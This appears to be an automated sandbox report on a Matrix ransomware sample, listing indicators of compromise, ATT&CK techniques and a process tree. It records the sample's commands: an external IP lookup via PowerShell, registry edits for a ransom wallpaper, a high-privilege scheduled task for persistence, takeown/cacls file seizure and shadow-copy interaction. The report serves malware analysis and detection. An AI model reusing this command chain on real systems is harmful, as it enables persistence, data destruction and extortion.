File opened (read-only)	\??\T:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\F:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened (read-only)	\??\A:	cIzGULwq64.exe
File opened (read-only)	\??\F:	cIzGULwq64.exe
File opened (read-only)	\??\G:	cIzGULwq64.exe
File opened (read-only)	\??\I:	cIzGULwq64.exe
File opened (read-only)	\??\W:	cIzGULwq64.exe
File opened (read-only)	\??\U:	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
153	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\v0XitIOL.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\jmxremote.password.template	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\javacpl.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\logging.properties	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\java.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\modules\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\java-rmi.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Notifications\SoftLandingAssetLight.gif	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\content-types.properties	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\autofill_labeling_features_email.txt.DATA	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr-Latn-RS.pak	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzmappings	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_ko.properties	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\WidevineCdm\manifest.json.DATA	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ka.pak.DATA	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\jp2launcher.exe	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fi.pak.DATA	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedgewebview2.exe.sig	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-util-lookup.jar	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\te.pak	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\sound.properties	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Extensions\#FOX_README#.rtf	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1520	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1756	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
8	powershell.exe
8	powershell.exe
3568	cIzGULwq64.exe
3568	cIzGULwq64.exe
3568	cIzGULwq64.exe
3568	cIzGULwq64.exe
3568	cIzGULwq64.exe
3568	cIzGULwq64.exe
3568	cIzGULwq64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
3568	cIzGULwq64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	3568	cIzGULwq64.exe
Token: SeLoadDriverPrivilege	3568	cIzGULwq64.exe
Token: SeTakeOwnershipPrivilege	1592	takeown.exe
Token: SeTakeOwnershipPrivilege	3232	takeown.exe
Token: SeTakeOwnershipPrivilege	1396	takeown.exe
Token: SeTakeOwnershipPrivilege	3460	takeown.exe
Token: SeTakeOwnershipPrivilege	112	takeown.exe
Token: SeTakeOwnershipPrivilege	1920	takeown.exe
Token: SeTakeOwnershipPrivilege	3372	takeown.exe
Token: SeTakeOwnershipPrivilege	3944	takeown.exe
Token: SeTakeOwnershipPrivilege	112	takeown.exe
Token: SeTakeOwnershipPrivilege	2520	takeown.exe
Token: SeTakeOwnershipPrivilege	1144	takeown.exe
Token: SeTakeOwnershipPrivilege	1492	takeown.exe
Token: SeTakeOwnershipPrivilege	3692	takeown.exe
Token: SeTakeOwnershipPrivilege	516	takeown.exe
Token: SeTakeOwnershipPrivilege	780	takeown.exe
Token: SeTakeOwnershipPrivilege	3632	takeown.exe
Token: SeTakeOwnershipPrivilege	3424	takeown.exe
Token: SeTakeOwnershipPrivilege	3916	takeown.exe
Token: SeTakeOwnershipPrivilege	1520	takeown.exe
Token: SeTakeOwnershipPrivilege	2556	takeown.exe
Token: SeTakeOwnershipPrivilege	1564	takeown.exe
Token: SeTakeOwnershipPrivilege	3672	takeown.exe
Token: SeTakeOwnershipPrivilege	3012	takeown.exe
Token: SeTakeOwnershipPrivilege	112	takeown.exe
Token: SeTakeOwnershipPrivilege	3256	takeown.exe
Token: SeBackupPrivilege	2220	vssvc.exe
Token: SeRestorePrivilege	2220	vssvc.exe
Token: SeAuditPrivilege	2220	vssvc.exe
Token: SeTakeOwnershipPrivilege	3184	takeown.exe
Token: SeTakeOwnershipPrivilege	2088	takeown.exe
Token: SeTakeOwnershipPrivilege	2088	takeown.exe
Token: SeTakeOwnershipPrivilege	3588	takeown.exe
Token: SeTakeOwnershipPrivilege	2424	takeown.exe
Token: SeTakeOwnershipPrivilege	3460	takeown.exe
Token: SeTakeOwnershipPrivilege	2484	takeown.exe
Token: SeTakeOwnershipPrivilege	1140	takeown.exe
Token: SeTakeOwnershipPrivilege	3692	takeown.exe
Token: SeIncreaseQuotaPrivilege	3588	WMIC.exe
Token: SeSecurityPrivilege	3588	WMIC.exe
Token: SeTakeOwnershipPrivilege	3588	WMIC.exe
Token: SeLoadDriverPrivilege	3588	WMIC.exe
Token: SeSystemProfilePrivilege	3588	WMIC.exe
Token: SeSystemtimePrivilege	3588	WMIC.exe
Token: SeProfSingleProcessPrivilege	3588	WMIC.exe
Token: SeIncBasePriorityPrivilege	3588	WMIC.exe
Token: SeCreatePagefilePrivilege	3588	WMIC.exe
Token: SeBackupPrivilege	3588	WMIC.exe
Token: SeRestorePrivilege	3588	WMIC.exe
Token: SeShutdownPrivilege	3588	WMIC.exe
Token: SeDebugPrivilege	3588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3588	WMIC.exe
Token: SeRemoteShutdownPrivilege	3588	WMIC.exe
Token: SeUndockPrivilege	3588	WMIC.exe
Token: SeManageVolumePrivilege	3588	WMIC.exe
Token: 33	3588	WMIC.exe
Token: 34	3588	WMIC.exe
Token: 35	3588	WMIC.exe
Token: 36	3588	WMIC.exe
Token: SeTakeOwnershipPrivilege	2096	takeown.exe
Token: SeIncreaseQuotaPrivilege	3588	WMIC.exe
Token: SeSecurityPrivilege	3588	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 3460	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	55
PID 3064 wrote to memory of 3460	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	55
PID 3064 wrote to memory of 3460	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	55
PID 3064 wrote to memory of 1768	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	57
PID 3064 wrote to memory of 1768	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	57
PID 3064 wrote to memory of 1768	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	57
PID 3064 wrote to memory of 3232	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	66
PID 3064 wrote to memory of 3232	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	66
PID 3064 wrote to memory of 3232	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	66
PID 3232 wrote to memory of 8	3232	cmd.exe	68
PID 3232 wrote to memory of 8	3232	cmd.exe	68
PID 3232 wrote to memory of 8	3232	cmd.exe	68
PID 3064 wrote to memory of 1396	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	69
PID 3064 wrote to memory of 1396	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	69
PID 3064 wrote to memory of 1396	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	69
PID 3064 wrote to memory of 3452	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	70
PID 3064 wrote to memory of 3452	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	70
PID 3064 wrote to memory of 3452	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	70
PID 3452 wrote to memory of 2424	3452	cmd.exe	73
PID 3452 wrote to memory of 2424	3452	cmd.exe	73
PID 3452 wrote to memory of 2424	3452	cmd.exe	73
PID 1396 wrote to memory of 2908	1396	cmd.exe	74
PID 1396 wrote to memory of 2908	1396	cmd.exe	74
PID 1396 wrote to memory of 2908	1396	cmd.exe	74
PID 1396 wrote to memory of 3772	1396	cmd.exe	75
PID 1396 wrote to memory of 3772	1396	cmd.exe	75
PID 1396 wrote to memory of 3772	1396	cmd.exe	75
PID 1396 wrote to memory of 1276	1396	cmd.exe	76
PID 1396 wrote to memory of 1276	1396	cmd.exe	76
PID 1396 wrote to memory of 1276	1396	cmd.exe	76
PID 3064 wrote to memory of 3388	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	77
PID 3064 wrote to memory of 3388	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	77
PID 3064 wrote to memory of 3388	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	77
PID 3388 wrote to memory of 1492	3388	cmd.exe	79
PID 3388 wrote to memory of 1492	3388	cmd.exe	79
PID 3388 wrote to memory of 1492	3388	cmd.exe	79
PID 3388 wrote to memory of 3352	3388	cmd.exe	80
PID 3388 wrote to memory of 3352	3388	cmd.exe	80
PID 3388 wrote to memory of 3352	3388	cmd.exe	80
PID 3388 wrote to memory of 2752	3388	cmd.exe	81
PID 3388 wrote to memory of 2752	3388	cmd.exe	81
PID 3388 wrote to memory of 2752	3388	cmd.exe	81
PID 2752 wrote to memory of 3796	2752	cmd.exe	82
PID 2752 wrote to memory of 3796	2752	cmd.exe	82
PID 2752 wrote to memory of 3796	2752	cmd.exe	82
PID 3796 wrote to memory of 3568	3796	cIzGULwq.exe	83
PID 3796 wrote to memory of 3568	3796	cIzGULwq.exe	83
PID 3064 wrote to memory of 1592	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	85
PID 3064 wrote to memory of 1592	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	85
PID 3064 wrote to memory of 1592	3064	2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe	85
PID 1592 wrote to memory of 1432	1592	cmd.exe	87
PID 1592 wrote to memory of 1432	1592	cmd.exe	87
PID 1592 wrote to memory of 1432	1592	cmd.exe	87
PID 1592 wrote to memory of 1520	1592	cmd.exe	88
PID 1592 wrote to memory of 1520	1592	cmd.exe	88
PID 1592 wrote to memory of 1520	1592	cmd.exe	88
PID 1592 wrote to memory of 3248	1592	cmd.exe	89
PID 1592 wrote to memory of 3248	1592	cmd.exe	89
PID 1592 wrote to memory of 3248	1592	cmd.exe	89
PID 3248 wrote to memory of 3968	3248	cmd.exe	90
PID 3248 wrote to memory of 3968	3248	cmd.exe	90
PID 3248 wrote to memory of 3968	3248	cmd.exe	90
PID 1592 wrote to memory of 3496	1592	cmd.exe	91
PID 1592 wrote to memory of 3496	1592	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe
"C:\Users\Admin\AppData\Local\Temp\2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2a6ce305bf0bc2b51a889bd577d4046e5e81857d85d1876f5fbd81512cad8aac.exe" "C:\Users\Admin\AppData\Local\Temp\NWg3R1sc.exe"
  2⤵
  PID:3460
- C:\Users\Admin\AppData\Local\Temp\NWg3R1sc.exe
  "C:\Users\Admin\AppData\Local\Temp\NWg3R1sc.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1768
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\Sw0lQeH2.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3232
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:8
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\v0XitIOL.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\v0XitIOL.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2908
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Lcnyp4U5.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3452
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Lcnyp4U5.vbs"
    3⤵
    - Checks computer location settings
    PID:2424
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\rbrsCstX.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:2112
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\rbrsCstX.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1520
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:3232
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr.db"
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "qmgr.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "qmgr.db" -nobanner
      4⤵
      Executes dropped EXE
